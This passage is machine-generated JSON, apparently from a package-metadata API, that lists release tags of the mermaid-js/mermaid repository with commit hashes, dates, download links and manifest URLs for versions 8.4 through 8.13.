13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"comm